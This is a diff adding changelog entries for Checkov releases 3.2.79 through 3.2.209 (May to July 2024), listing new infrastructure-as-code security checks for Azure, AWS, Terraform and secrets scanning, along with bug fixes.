+## [3.2.209](https://github.com/bridgecrewio/checkov/compare/3.2.208...3.2.209) - 2024-07-28
+
+### Feature
+
+- **cloudformation:** Enrich cloudsplaining eval keys - [#6602](https://github.com/bridgecrewio/checkov/pull/6602)
+
+### Documentation
+
+- **general:** add --repo-id to relevant examples with API key - [#6605](https://github.com/bridgecrewio/checkov/pull/6605)
+
+## [3.2.208](https://github.com/bridgecrewio/checkov/compare/3.2.204...3.2.208) - 2024-07-25
+
+### Feature
+
+- **general:** filter resource by provider for all resources types - [#6598](https://github.com/bridgecrewio/checkov/pull/6598)
+- **secrets:** add CKV_SECRET_192 to GENERIC_PRIVATE_KEY_CHECK_IDS - [#6600](https://github.com/bridgecrewio/checkov/pull/6600)
+- **terraform:** Update ckv-aws-8 policy - support unknown statement  - [#6596](https://github.com/bridgecrewio/checkov/pull/6596)
+
+### Bug Fix
+
+- **terraform:** Fix resource type for CKV_AZURE_242 - [#6599](https://github.com/bridgecrewio/checkov/pull/6599)
+
+### Platform
+
+- **general:** handle multiple values for the same metadata filter - [#6604](https://github.com/bridgecrewio/checkov/pull/6604)
+
+## [3.2.204](https://github.com/bridgecrewio/checkov/compare/3.2.201...3.2.204) - 2024-07-24
+
+### Feature
+
+- **arm:** add CKV_AZURE_191 to ensure that Managed identity provider is enabled for Azure Event Grid Topic - [#6496](https://github.com/bridgecrewio/checkov/pull/6496)
+
+### Bug Fix
+
+- **sast:** BCE-36172 fix cdk policies - [#6588](https://github.com/bridgecrewio/checkov/pull/6588)
+
+## [3.2.201](https://github.com/bridgecrewio/checkov/compare/3.2.199...3.2.201) - 2024-07-23
+
+### Feature
+
+- **terraform:** add 14 rules for tencentcloud provider - [#6448](https://github.com/bridgecrewio/checkov/pull/6448)
+
+### Bug Fix
+
+- **secrets:** fix secrets prerun bug - [#6594](https://github.com/bridgecrewio/checkov/pull/6594)
+- **terraform:** Exclude String in CKV_AWS_337 - [#6592](https://github.com/bridgecrewio/checkov/pull/6592)
+
+## [3.2.199](https://github.com/bridgecrewio/checkov/compare/3.2.196...3.2.199) - 2024-07-22
+
+### Feature
+
+- **arm:** add CKV_AZURE_87 to ensure that Azure Defender is set to On for Key Vault - [#6418](https://github.com/bridgecrewio/checkov/pull/6418)
+- **arm:** ARM VnetSingleDNSServer - [#6379](https://github.com/bridgecrewio/checkov/pull/6379)
+- **secrets:** Adding the option to prerun before multiline pattern executing - [#6586](https://github.com/bridgecrewio/checkov/pull/6586)
+- **secrets:** If the prrun regex found but we already scanned file we already scann… - [#6591](https://github.com/bridgecrewio/checkov/pull/6591)
+
+## [3.2.196](https://github.com/bridgecrewio/checkov/compare/3.2.194...3.2.196) - 2024-07-21
+
+### Feature
+
+- **general:** Add metadata exception filter to GHA - [#6583](https://github.com/bridgecrewio/checkov/pull/6583)
+- **general:** Refactor all resource type handling in Checkov - [#6572](https://github.com/bridgecrewio/checkov/pull/6572)
+
+## [3.2.194](https://github.com/bridgecrewio/checkov/compare/3.2.193...3.2.194) - 2024-07-18
+
+### Feature
+
+- **arm:** AKSEncryptionAtHostEnable - [#6575](https://github.com/bridgecrewio/checkov/pull/6575)
+- **arm:** AKSEphemeralOSDisks - [#6578](https://github.com/bridgecrewio/checkov/pull/6578)
+- **arm:** CKV_AZURE_92 to Ensure that Virtual Machines use managed disks - [#6455](https://github.com/bridgecrewio/checkov/pull/6455)
+- **arm:** FrontDoorWAFACLCVE202144228 - Mitigates the Log4j2 vulnerability CVE-2021-44228. - [#6419](https://github.com/bridgecrewio/checkov/pull/6419)
+
+### Bug Fix
+
+- **general:** fix the right numbers in TestSkipJsonRegexPattern - [#6580](https://github.com/bridgecrewio/checkov/pull/6580)
+- **terraform:** Fix title of CKV_AZURE_238 - [#6570](https://github.com/bridgecrewio/checkov/pull/6570)
+
+## [3.2.193](https://github.com/bridgecrewio/checkov/compare/3.2.191...3.2.193) - 2024-07-17
+
+### Bug Fix
+
+- **terraform:** fix failures of no caller on definition context - [#6573](https://github.com/bridgecrewio/checkov/pull/6573)
+- **terraform:** TFPlan + TF fixes for google_project_iam_policy + google_iam_policy - [#6577](https://github.com/bridgecrewio/checkov/pull/6577)
+
+## [3.2.191](https://github.com/bridgecrewio/checkov/compare/3.2.190...3.2.191) - 2024-07-16
+
+### Bug Fix
+
+- **general:** fix sca unit tests for python 3.12 - [#6574](https://github.com/bridgecrewio/checkov/pull/6574)
+
+## [3.2.190](https://github.com/bridgecrewio/checkov/compare/3.2.189...3.2.190) - 2024-07-15
+
+- no noteworthy changes
+
+## [3.2.189](https://github.com/bridgecrewio/checkov/compare/3.2.186...3.2.189) - 2024-07-14
+
+### Feature
+
+- **arm:** add CKV_AZURE_169 to ensure that AKS use the Paid Sku for its SLA - [#6545](https://github.com/bridgecrewio/checkov/pull/6545)
+- **arm:** add CKV_AZURE_177 to ensure that Windows VM enables automatic updates - [#6484](https://github.com/bridgecrewio/checkov/pull/6484)
+- **cloudformation:** Update audit_logs valid values - [#6566](https://github.com/bridgecrewio/checkov/pull/6566)
+
+## [3.2.186](https://github.com/bridgecrewio/checkov/compare/3.2.183...3.2.186) - 2024-07-11
+
+### Feature
+
+- **azure:** add new policies for Azure Synapse (tf and arm) - [#6554](https://github.com/bridgecrewio/checkov/pull/6554)
+- **bicep:** support bicep custom policy - [#6561](https://github.com/bridgecrewio/checkov/pull/6561)
+
+### Bug Fix
+
+- **arm:** CKV_AZURE_56 just for authsettingsV2 name - [#6557](https://github.com/bridgecrewio/checkov/pull/6557)
+- **secrets:** filter secrets that have vault: in them - [#6565](https://github.com/bridgecrewio/checkov/pull/6565)
+
+## [3.2.183](https://github.com/bridgecrewio/checkov/compare/3.2.179...3.2.183) - 2024-07-10
+
+### Feature
+
+- **terraform_plan:** support tf_plan after_unknown enrichment - [#6517](https://github.com/bridgecrewio/checkov/pull/6517)
+
+### Bug Fix
+
+- **secrets:** small fix for filtering - [#6562](https://github.com/bridgecrewio/checkov/pull/6562)
+
+### Platform
+
+- **general:** pass repo ID to runconfig - [#6560](https://github.com/bridgecrewio/checkov/pull/6560)
+
+## [3.2.179](https://github.com/bridgecrewio/checkov/compare/3.2.177...3.2.179) - 2024-07-09
+
+### Feature
+
+- **arm:** add CKV_AZURE_206 to ensure that Storage Accounts use replication - [#6524](https://github.com/bridgecrewio/checkov/pull/6524)
+- **arm:** BCE-33785 Support Azure Synapse Analytics policies - [#6513](https://github.com/bridgecrewio/checkov/pull/6513)
+
+## [3.2.177](https://github.com/bridgecrewio/checkov/compare/3.2.175...3.2.177) - 2024-07-08
+
+### Bug Fix
+
+- **sast:** fix cdk policies - [#6552](https://github.com/bridgecrewio/checkov/pull/6552)
+
+## [3.2.175](https://github.com/bridgecrewio/checkov/compare/3.2.174...3.2.175) - 2024-07-07
+
+### Feature
+
+- **arm:** AzureSearchSQLQueryUpdates - [#6543](https://github.com/bridgecrewio/checkov/pull/6543)
+
+## [3.2.174](https://github.com/bridgecrewio/checkov/compare/3.2.171...3.2.174) - 2024-07-04
+
+### Feature
+
+- **arm:** add CKV_AZURE_172 to ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters - [#6533](https://github.com/bridgecrewio/checkov/pull/6533)
+- **arm:** add CKV_AZURE_173 to ensure that API management uses at least TLS 1.2 - [#6478](https://github.com/bridgecrewio/checkov/pull/6478)
+- **arm:** AppServicePlanZoneRedundant - [#6472](https://github.com/bridgecrewio/checkov/pull/6472)
+- **arm:** AzureSearchSLAIndex - [#6530](https://github.com/bridgecrewio/checkov/pull/6530)
+- **arm:** SQLDatabaseZoneRedundant - [#6515](https://github.com/bridgecrewio/checkov/pull/6515)
+- **azure:** add new policies for Azure Synapse - [#6520](https://github.com/bridgecrewio/checkov/pull/6520)
+- **general:** update detect secrets package - [#6535](https://github.com/bridgecrewio/checkov/pull/6535)
+
+## [3.2.171](https://github.com/bridgecrewio/checkov/compare/3.2.164...3.2.171) - 2024-07-03
+
+### Feature
+
+- **arm:** add CKV_AZURE_171 to ensure that AKS cluster upgrade channel is chosen - [#6532](https://github.com/bridgecrewio/checkov/pull/6532)
+- **arm:** add CKV_AZURE_175 to ensure that Web PubSub uses a SKU with an SLA - [#6523](https://github.com/bridgecrewio/checkov/pull/6523)
+- **arm:** add CKV_AZURE_178 to ensure that linux VM enables SSH with keys for secure communication - [#6486](https://github.com/bridgecrewio/checkov/pull/6486)
+- **arm:** add CKV_AZURE_85 to ensure that Azure Defender is set to On for Kubernetes - [#6279](https://github.com/bridgecrewio/checkov/pull/6279)
+- **arm:** CKV_AZURE_99 to Ensure Cosmos DB accounts have restricted access - [#6498](https://github.com/bridgecrewio/checkov/pull/6498)
+- **arm:** DataFactoryNoPublicNetworkAccess - [#6479](https://github.com/bridgecrewio/checkov/pull/6479)
+- **arm:** DataLakeStoreEncryption - [#6516](https://github.com/bridgecrewio/checkov/pull/6516)
+- **arm:** EventHubNamespaceMinTLS12 - [#6485](https://github.com/bridgecrewio/checkov/pull/6485)
+
+### Bug Fix
+
+- **openapi:** [CKV_OPENAPI_3] Prevent false-positive when checking for http+!basic - [#6406](https://github.com/bridgecrewio/checkov/pull/6406)
+- **terraform_json:** support locals block in CDKTF output - [#6452](https://github.com/bridgecrewio/checkov/pull/6452)
+- **terraform:** Deprecate CKV2_AWS_67 - [#6529](https://github.com/bridgecrewio/checkov/pull/6529)
+
+## [3.2.164](https://github.com/bridgecrewio/checkov/compare/3.2.163...3.2.164) - 2024-07-02
+
+### Documentation
+
+- **general:** Add Python note - [#6521](https://github.com/bridgecrewio/checkov/pull/6521)
+
+## [3.2.163](https://github.com/bridgecrewio/checkov/compare/3.2.159...3.2.163) - 2024-07-01
+
+### Feature
+
+- **arm:** add CKV_AZURE_174 to ensure that API management public access is disabled - [#6480](https://github.com/bridgecrewio/checkov/pull/6480)
+- **arm:** AppServicePHPVersion - [#6436](https://github.com/bridgecrewio/checkov/pull/6436)
+- **arm:** AppServicePublicAccessDisabled - [#6467](https://github.com/bridgecrewio/checkov/pull/6467)
+- **arm:** KeyVaultEnablesPurgeProtection - [#6465](https://github.com/bridgecrewio/checkov/pull/6465)
+- **arm:** PubsubSpecifyIdentity - [#6483](https://github.com/bridgecrewio/checkov/pull/6483)
+
+## [3.2.159](https://github.com/bridgecrewio/checkov/compare/3.2.156...3.2.159) - 2024-06-30
+
+### Bug Fix
+
+- **arm:** fix CKV_AZURE_78: `siteConfig` object should be under `properties` - [#6477](https://github.com/bridgecrewio/checkov/pull/6477)
+- **general:** Mypy issues - [#6510](https://github.com/bridgecrewio/checkov/pull/6510)
+- **terraform:** ignore comment out modules  - [#6507](https://github.com/bridgecrewio/checkov/pull/6507)
+
+## [3.2.156](https://github.com/bridgecrewio/checkov/compare/3.2.145...3.2.156) - 2024-06-27
+
+### Feature
+
+- **arm:** add CKV_AZURE_129 Ensure that MariaDB server enables geo-redundant backups  - [#6427](https://github.com/bridgecrewio/checkov/pull/6427)
+- **arm:** add CKV_AZURE_137 Ensure ACR admin account is disabled - [#6430](https://github.com/bridgecrewio/checkov/pull/6430)
+- **arm:** add CKV_AZURE_139 Ensure ACR set to disable public networking - [#6428](https://github.com/bridgecrewio/checkov/pull/6428)
+- **arm:** add CKV_AZURE_166 Ensure container image quarantine, scan, and mark images verified - [#6431](https://github.com/bridgecrewio/checkov/pull/6431)
+- **arm:** add CKV_AZURE_168 to ensure that Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods - [#6385](https://github.com/bridgecrewio/checkov/pull/6385)
+- **arm:** add CKV_AZURE_45 to ensure that no sensitive credentials are exposed in VM custom_data - [#6422](https://github.com/bridgecrewio/checkov/pull/6422)
+- **arm:** add CKV_AZURE_70 to ensure that Function apps is only accessible over HTTPS - [#6457](https://github.com/bridgecrewio/checkov/pull/6457)
+- **arm:** ARM AppServiceSlotDebugDisabled - CKV_AZURE_155 - [#6453](https://github.com/bridgecrewio/checkov/pull/6453)
+- **arm:** ARM AppServiceSlotHTTPSOnly - [#6454](https://github.com/bridgecrewio/checkov/pull/6454)
+- **arm:** ARM VnetLocalDNS - [#6424](https://github.com/bridgecrewio/checkov/pull/6424)
+- **arm:** PostgressSQLGeoBackupEnabled - [#6456](https://github.com/bridgecrewio/checkov/pull/6456)
+- **arm:** StorageAccountName - [#6426](https://github.com/bridgecrewio/checkov/pull/6426)
+- **secrets:** dont filter secrets - [#6508](https://github.com/bridgecrewio/checkov/pull/6508)
+
+### Bug Fix
+
+- **azure:** fix description of CKV_AZURE_236 - [#6503](https://github.com/bridgecrewio/checkov/pull/6503)
+- **kubernetes:** Fix CKV_K8S_31 for CronJobs - [#6506](https://github.com/bridgecrewio/checkov/pull/6506)
+- **sca:** fix parsing json with comments - [#6509](https://github.com/bridgecrewio/checkov/pull/6509)
+- **terraform:** CKV_AWS_339 add Kubernetes 1.30 to AWS EKS version checks - [#6353](https://github.com/bridgecrewio/checkov/pull/6353)
+- **terraform:** remove print from CKV_AWS_364 - [#6504](https://github.com/bridgecrewio/checkov/pull/6504)
+
+## [3.2.145](https://github.com/bridgecrewio/checkov/compare/3.2.144...3.2.145) - 2024-06-25
+
+### Documentation
+
+- **general:** Note for feature requests - [#6497](https://github.com/bridgecrewio/checkov/pull/6497)
+
+## [3.2.144](https://github.com/bridgecrewio/checkov/compare/3.2.141...3.2.144) - 2024-06-23
+
+### Bug Fix
+
+- **kubernetes:** ensure seccompProfile is set to RuntimeDefault for all containers in deployments and similar resources - [#6459](https://github.com/bridgecrewio/checkov/pull/6459)
+- **terraform:** Add more conditions for CKV_AWS_70 - [#6464](https://github.com/bridgecrewio/checkov/pull/6464)
+
+## [3.2.141](https://github.com/bridgecrewio/checkov/compare/3.2.140...3.2.141) - 2024-06-19
+
+### Bug Fix
+
+- **secrets:** dedup secrets history values - [#6462](https://github.com/bridgecrewio/checkov/pull/6462)
+
+## [3.2.140](https://github.com/bridgecrewio/checkov/compare/3.2.138...3.2.140) - 2024-06-18
+
+### Feature
+
+- **azure:** fix ckv_azure_189 according to docs - [#6413](https://github.com/bridgecrewio/checkov/pull/6413)
+
+### Bug Fix
+
+- **sca:** Support parsing json with comments - [#6466](https://github.com/bridgecrewio/checkov/pull/6466)
+
+### Documentation
+
+- **general:** fix pre-commit link - [#6433](https://github.com/bridgecrewio/checkov/pull/6433)
+
+## [3.2.138](https://github.com/bridgecrewio/checkov/compare/3.2.136...3.2.138) - 2024-06-17
+
+### Feature
+
+- **graph:** support creation of resource type allow/deny lists - [#6451](https://github.com/bridgecrewio/checkov/pull/6451)
+
+### Bug Fix
+
+- **terraform:** Fix name of CKV2_AWS_67 to be more clear - [#6434](https://github.com/bridgecrewio/checkov/pull/6434)
+- **terraform:** Fix when apt is in rm statement - [#6437](https://github.com/bridgecrewio/checkov/pull/6437)
+- **terraform:** Update CKV_AWS_224 title - [#6435](https://github.com/bridgecrewio/checkov/pull/6435)
+
+## [3.2.136](https://github.com/bridgecrewio/checkov/compare/3.2.133...3.2.136) - 2024-06-13
+
+### Bug Fix
+
+- **arm:** Correct AzureMLWorkspacePrivateEndpoint rule check logic - [#6432](https://github.com/bridgecrewio/checkov/pull/6432)
+- **general:** removed references Putin references - [#6445](https://github.com/bridgecrewio/checkov/pull/6445)
+
+## [3.2.133](https://github.com/bridgecrewio/checkov/compare/3.2.130...3.2.133) - 2024-06-10
+
+### Feature
+
+- **general:** add AI_AND_ML to CheckCategories - [#6423](https://github.com/bridgecrewio/checkov/pull/6423)
+
+### Bug Fix
+
+- **sast:** Update CKV IDs for CDK policies - [#6415](https://github.com/bridgecrewio/checkov/pull/6415)
+
+## [3.2.130](https://github.com/bridgecrewio/checkov/compare/3.2.128...3.2.130) - 2024-06-09
+
+### Feature
+
+- **arm:** add CKV_AZURE_135 to ensure Application Gateway WAF prevents message lookup in Log4j2.  - [#6364](https://github.com/bridgecrewio/checkov/pull/6364)
+- **arm:** add CKV_AZURE_140 to ensure that Local Authentication is disabled on CosmosDB - [#6329](https://github.com/bridgecrewio/checkov/pull/6329)
+- **arm:** add CKV_AZURE_163  Enable vulnerability scanning for container images - [#6339](https://github.com/bridgecrewio/checkov/pull/6339)
+- **arm:** add MariaDbPublicAccessDisabled convert policy to arm - [#6246](https://github.com/bridgecrewio/checkov/pull/6246)
+- **arm:** AKSLocalAdminDisabled - [#6334](https://github.com/bridgecrewio/checkov/pull/6334)
+- **arm:** AppServiceFTPSState - [#6363](https://github.com/bridgecrewio/checkov/pull/6363)
+- **arm:** AzureServiceFabricClusterProtectionLevel - [#6366](https://github.com/bridgecrewio/checkov/pull/6366)
+- **arm:** ensure ACR disables anonymous pulling of images (CKV_AZURE_138) - [#6373](https://github.com/bridgecrewio/checkov/pull/6373)
+- **arm:** KeyVaultDisablesPublicNetworkAccess - [#6342](https://github.com/bridgecrewio/checkov/pull/6342)
+- **arm:** PostgreSQLServerPublicAccessDisabled - [#6330](https://github.com/bridgecrewio/checkov/pull/6330)
+- **terraform:** extract image referencers for AWS SageMaker - [#6408](https://github.com/bridgecrewio/checkov/pull/6408)
+
+### Bug Fix
+
+- **ansible:** add dict check in create_tasks_vertices - [#6417](https://github.com/bridgecrewio/checkov/pull/6417)
+
+## [3.2.128](https://github.com/bridgecrewio/checkov/compare/3.2.125...3.2.128) - 2024-06-06
+
+### Feature
+
+- **azure:** drop support for dotnet v7.0 - [#6383](https://github.com/bridgecrewio/checkov/pull/6383)
+- **general:** Image Referencer should not run for CI workflow files - [#6386](https://github.com/bridgecrewio/checkov/pull/6386)
+- **secrets:** Add _prioritise_secrets by 3 levels of severity - [#6390](https://github.com/bridgecrewio/checkov/pull/6390)
+- **terraform:** add 5 policies - [#6401](https://github.com/bridgecrewio/checkov/pull/6401)
+- **terraform:** add 6 policies - [#6396](https://github.com/bridgecrewio/checkov/pull/6396)
+- **terraform:** add fix for ckv_aws_300 - [#6404](https://github.com/bridgecrewio/checkov/pull/6404)
+- **terraform:** add fix for not contains solver - [#6389](https://github.com/bridgecrewio/checkov/pull/6389)
+
+### Bug Fix
+
+- **ansible:** filter conf if its int or float - [#6409](https://github.com/bridgecrewio/checkov/pull/6409)
+- **general:** add try except gihub_action read file - [#6411](https://github.com/bridgecrewio/checkov/pull/6411)
+- **general:** bitbucket integration test failure - [#6407](https://github.com/bridgecrewio/checkov/pull/6407)
+- **general:** CKV2_AZURE_50 generates false positive azurerm_storage_account violations - [#6391](https://github.com/bridgecrewio/checkov/pull/6391)
+- **sast:** add log for sast on windows - [#6397](https://github.com/bridgecrewio/checkov/pull/6397)
+
+## [3.2.125](https://github.com/bridgecrewio/checkov/compare/3.2.124...3.2.125) - 2024-06-03
+
+### Feature
+
+- **arm:** Add check for AzureML workspace not configured with private endpoint - [#6387](https://github.com/bridgecrewio/checkov/pull/6387)
+
+## [3.2.124](https://github.com/bridgecrewio/checkov/compare/3.2.122...3.2.124) - 2024-06-02
+
+### Feature
+
+- **azure:** Add policy to ensure proper AzureML Workspace network access - [#6362](https://github.com/bridgecrewio/checkov/pull/6362)
+- **azure:** Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible - [#6368](https://github.com/bridgecrewio/checkov/pull/6368)
+
+## [3.2.122](https://github.com/bridgecrewio/checkov/compare/3.2.121...3.2.122) - 2024-06-01
+
+### Feature
+
+- **arm:** AppServicePythonVersion - 82 check the 'python version' is the latest, if used to run the web app - [#6282](https://github.com/bridgecrewio/checkov/pull/6282)
+
+## [3.2.121](https://github.com/bridgecrewio/checkov/compare/3.2.119...3.2.121) - 2024-05-31
+
+### Feature
+
+- **terraform:** AWS SageMaker notebook instance KMS Key - [#6374](https://github.com/bridgecrewio/checkov/pull/6374)
+- **terraform:** CognitiveServicesConfigureIdentity - new check - [#6378](https://github.com/bridgecrewio/checkov/pull/6378)
+- **terraform:** Ensure that Cognitive Services accounts enable local authentication - new check - [#6377](https://github.com/bridgecrewio/checkov/pull/6377)
+
+## [3.2.119](https://github.com/bridgecrewio/checkov/compare/3.2.112...3.2.119) - 2024-05-30
+
+### Feature
+
+- **arm:** add FunctionAppsEnableAuthentication - Checking if a certain field exists - [#6250](https://github.com/bridgecrewio/checkov/pull/6250)
+- **terraform:** Add more conditions to CKV_AWS_70 - [#6371](https://github.com/bridgecrewio/checkov/pull/6371)
+- **terraform:** Added the CKV2_AWS_68 Check for TF and CFN - [#6369](https://github.com/bridgecrewio/checkov/pull/6369)
+
+### Bug Fix
+
+- **ansible:** set task as ansible vertices config - [#6376](https://github.com/bridgecrewio/checkov/pull/6376)
+- **terraform:** for_each/count attribute wasn't rendering if referencing a dynamic variable of a higher level module - [#6372](https://github.com/bridgecrewio/checkov/pull/6372)
+
+## [3.2.112](https://github.com/bridgecrewio/checkov/compare/3.2.108...3.2.112) - 2024-05-29
+
+### Feature
+
+- **terraform:** Add provider address to resources - [#6266](https://github.com/bridgecrewio/checkov/pull/6266)
+- **terraform:** Support for count & for_each in data blocks - [#6359](https://github.com/bridgecrewio/checkov/pull/6359)
+
+### Bug Fix
+
+- **terraform:** Fix an issue for loading tfvars + issue in the dynamic rendering - [#6360](https://github.com/bridgecrewio/checkov/pull/6360)
+
+## [3.2.108](https://github.com/bridgecrewio/checkov/compare/3.2.107...3.2.108) - 2024-05-26
+
+### Bug Fix
+
+- **sast:** don't scan hidden files - [#6349](https://github.com/bridgecrewio/checkov/pull/6349)
+
+## [3.2.107](https://github.com/bridgecrewio/checkov/compare/3.2.106...3.2.107) - 2024-05-24
+
+### Bug Fix
+
+- **terraform:** Handle registry modules with a version in CKF_TF_2 - [#6354](https://github.com/bridgecrewio/checkov/pull/6354)
+
+## [3.2.106](https://github.com/bridgecrewio/checkov/compare/3.2.105...3.2.106) - 2024-05-23
+
+### Feature
+
+- **arm:** Ensure Databricks Workspace data plane to control plane co… - [#6319](https://github.com/bridgecrewio/checkov/pull/6319)
+- **general:** TF and ARM - Ensure that Databricks Workspaces enable… - [#6313](https://github.com/bridgecrewio/checkov/pull/6313)
+- **secrets:** Bump detect-secrets - [#6346](https://github.com/bridgecrewio/checkov/pull/6346)
+
+## [3.2.105](https://github.com/bridgecrewio/checkov/compare/3.2.100...3.2.105) - 2024-05-22
+
+### Feature
+
+- **arm:** add AppServiceJavaVersion - [#6258](https://github.com/bridgecrewio/checkov/pull/6258)
+- **arm:** add CKV_AZURE_145 to check that the function app uses the latest version of TLS encryption - [#6323](https://github.com/bridgecrewio/checkov/pull/6323)
+- **arm:** add CKV_AZURE_218 to ensure that Application Gateway defines secure protocols for in transit communicationApp gw defines secure protocols - [#6320](https://github.com/bridgecrewio/checkov/pull/6320)
+- **arm:** add CKV_AZURE_54 to ensure Enforce a minimal Tls version for the server - [#6270](https://github.com/bridgecrewio/checkov/pull/6270)
+- **arm:** add CKV_AZURE_71 to  Ensure that Managed identity provider is enabled for web apps - [#6272](https://github.com/bridgecrewio/checkov/pull/6272)
+- **arm:** add CKV_AZURE_72 to ensure that remote debugging is not enabled for app services - [#6281](https://github.com/bridgecrewio/checkov/pull/6281)
+- **arm:** AzureDefenderOStorage - [#6269](https://github.com/bridgecrewio/checkov/pull/6269)
+- **arm:** MySQLPublicAccessDisabled-Azure MySQL: Restrict Public Access - [#6263](https://github.com/bridgecrewio/checkov/pull/6263)
+- **arm:** StorageSyncPublicAccessDisabled - [#6331](https://github.com/bridgecrewio/checkov/pull/6331)
+- **secrets:** eliminate false positives in entropy keyword combinator detector - [#6327](https://github.com/bridgecrewio/checkov/pull/6327)
+
+### Bug Fix
+
+- **ansible:** fix ansible resource id in local graph - [#6344](https://github.com/bridgecrewio/checkov/pull/6344)
+- **secrets:** fix entropy type - [#6347](https://github.com/bridgecrewio/checkov/pull/6347)
+
+## [3.2.100](https://github.com/bridgecrewio/checkov/compare/3.2.98...3.2.100) - 2024-05-21
+
+### Feature
+
+- **sast:** TS-legacy-checks - [#6311](https://github.com/bridgecrewio/checkov/pull/6311)
+- **secrets:** entropy limit as env variable - [#6332](https://github.com/bridgecrewio/checkov/pull/6332)
+
+## [3.2.98](https://github.com/bridgecrewio/checkov/compare/3.2.97...3.2.98) - 2024-05-20
+
+### Bug Fix
+
+- **terraform:** Remove invalid CIDRs in CKV2_AWS_44 - [#6301](https://github.com/bridgecrewio/checkov/pull/6301)
+
+## [3.2.97](https://github.com/bridgecrewio/checkov/compare/3.2.95...3.2.97) - 2024-05-19
+
+### Feature
+
+- **arm:** add CKV_AZURE_73 to ensure that Automation account variables are encrypted - [#6271](https://github.com/bridgecrewio/checkov/pull/6271)
+- **arm:** add CKV_AZURE_76 to ensure that Azure Batch account uses key vault to encrypt data - [#6280](https://github.com/bridgecrewio/checkov/pull/6280)
+- **arm:** add FunctionAppDisallowCORS - password correctness check - [#6248](https://github.com/bridgecrewio/checkov/pull/6248)
+- **arm:** ARM FunctionAppHttpVersionLatest policy - [#6244](https://github.com/bridgecrewio/checkov/pull/6244)
+- **arm:** CKV_AZURE_74 to Ensure that Azure Data Explorer (Kusto) uses disk encryption - [#6273](https://github.com/bridgecrewio/checkov/pull/6273)
+- **arm:** MSSQLServerMinTLSVersion - [#6245](https://github.com/bridgecrewio/checkov/pull/6245)
+
+## [3.2.95](https://github.com/bridgecrewio/checkov/compare/3.2.94...3.2.95) - 2024-05-17
+
+### Bug Fix
+
+- **terraform:** handle module source tag ref when it is not the first parameter - [#6314](https://github.com/bridgecrewio/checkov/pull/6314)
+
+## [3.2.94](https://github.com/bridgecrewio/checkov/compare/3.2.92...3.2.94) - 2024-05-16
+
+### Bug Fix
+
+- **sast:** fix random test sast js - [#6315](https://github.com/bridgecrewio/checkov/pull/6315)
+
+### Platform
+
+- **general:** Double-Encode URI for RelayState Parameter - [#6302](https://github.com/bridgecrewio/checkov/pull/6302)
+
+## [3.2.92](https://github.com/bridgecrewio/checkov/compare/3.2.91...3.2.92) - 2024-05-15
+
+### Feature
+
+- **sast:** CDK TypeScript policies - [#6161](https://github.com/bridgecrewio/checkov/pull/6161)
+- **terraform:** add check for tf module versioned tag - [#6213](https://github.com/bridgecrewio/checkov/pull/6213)
+
+### Bug Fix
+
+- **secrets:** secret_filter_block_list filter by file name and suffixes - [#6285](https://github.com/bridgecrewio/checkov/pull/6285)
+- **secrets:** secret_filter_block_list filter by file name and suffixes 2 - [#6306](https://github.com/bridgecrewio/checkov/pull/6306)
+
+### Platform
+
+- **general:** Fix policy.name to use the spaces as specified on CLI. - [#6296](https://github.com/bridgecrewio/checkov/pull/6296)
+
+## [3.2.91](https://github.com/bridgecrewio/checkov/compare/3.2.90...3.2.91) - 2024-05-12
+
+### Feature
+
+- **secrets:** bump bc-detect-secrets to 1.5.10 - [#6297](https://github.com/bridgecrewio/checkov/pull/6297)
+
+## [3.2.90](https://github.com/bridgecrewio/checkov/compare/3.2.85...3.2.90) - 2024-05-09
+
+### Feature
+
+- **general:** Add deep-analysis to GHA - [#6288](https://github.com/bridgecrewio/checkov/pull/6288)
+- **terraform:** Add more hype policies - [#6239](https://github.com/bridgecrewio/checkov/pull/6239)
+
+### Bug Fix
+
+- **ansible:** fix ansible definitions raw type - [#6292](https://github.com/bridgecrewio/checkov/pull/6292)
+
+### Platform
+
+- **ansible:** add set definitions raw to ansible runner - [#6286](https://github.com/bridgecrewio/checkov/pull/6286)
+- **general:** Handle SAST suppressions (suppressions V2) - [#6109](https://github.com/bridgecrewio/checkov/pull/6109)
+
+### Documentation
+
+- **general:** add RENDER_EDGES_DUPLICATE_ITER_COUNT to docs - [#6291](https://github.com/bridgecrewio/checkov/pull/6291)
+- **general:** Update README links for PyPi - [#6231](https://github.com/bridgecrewio/checkov/pull/6231)
+
+## [3.2.85](https://github.com/bridgecrewio/checkov/compare/3.2.84...3.2.85) - 2024-05-08
+
+### Platform
+
+- **ansible:** add missing arg to ansible runner - [#6276](https://github.com/bridgecrewio/checkov/pull/6276)
+
+## [3.2.84](https://github.com/bridgecrewio/checkov/compare/3.2.82...3.2.84) - 2024-05-07
+
+### Feature
+
+- **sast:** Enable cdk ts integraion test - [#6158](https://github.com/bridgecrewio/checkov/pull/6158)
+
+### Bug Fix
+
+- **secrets:** add files for secret to skip - [#6275](https://github.com/bridgecrewio/checkov/pull/6275)
+- **terraform:** Update CKV_AWS_31 for RBAC - [#6224](https://github.com/bridgecrewio/checkov/pull/6224)
+
+## [3.2.82](https://github.com/bridgecrewio/checkov/compare/3.2.79...3.2.82) - 2024-05-06
+
+### Feature
+
+- **github:** add summary message in github_failed_only output - [#6131](https://github.com/bridgecrewio/checkov/pull/6131)
+- **sast:** add ts checks to python pack - [#6261](https://github.com/bridgecrewio/checkov/pull/6261)
+- **sast:** run all cdk integration test - [#6256](https://github.com/bridgecrewio/checkov/pull/6256)
+
+### Bug Fix
+
+- **general:** fix changed serif path - [#6251](https://github.com/bridgecrewio/checkov/pull/6251)
+
+## [3.2.79](https://github.com/bridgecrewio/checkov/compare/3.2.74...3.2.79) - 2024-05-02
+
+### Feature
+
+- **sast:** Add 10 TS CDK - [#6194](https://github.com/bridgecrewio/checkov/pull/6194)
+- **sast:** add typescript - DONT MERGE - [#6193](https://github.com/bridgecrewio/checkov/pull/6193)
+- **sast:** Filter js files generate by ts - [#6220](https://github.com/bridgecrewio/checkov/pull/6220)
+- **secrets:** bump bc-detect-secrets 1.5.9 - [#6205](https://github.com/bridgecrewio/checkov/pull/6205)
+- **terraform:** Add GCP policy - [#6177](https://github.com/bridgecrewio/checkov/pull/6177)
+- **terraform:** Add resource attributes to jsonify - [#6203](https://github.com/bridgecrewio/checkov/pull/6203)
+- **terraform:** Ensure dedicated data endpoints are enabled - [#6188](https://github.com/bridgecrewio/checkov/pull/6188)
+- **terraform:** support provider in tf_plan graph - [#6195](https://github.com/bridgecrewio/checkov/pull/6195)
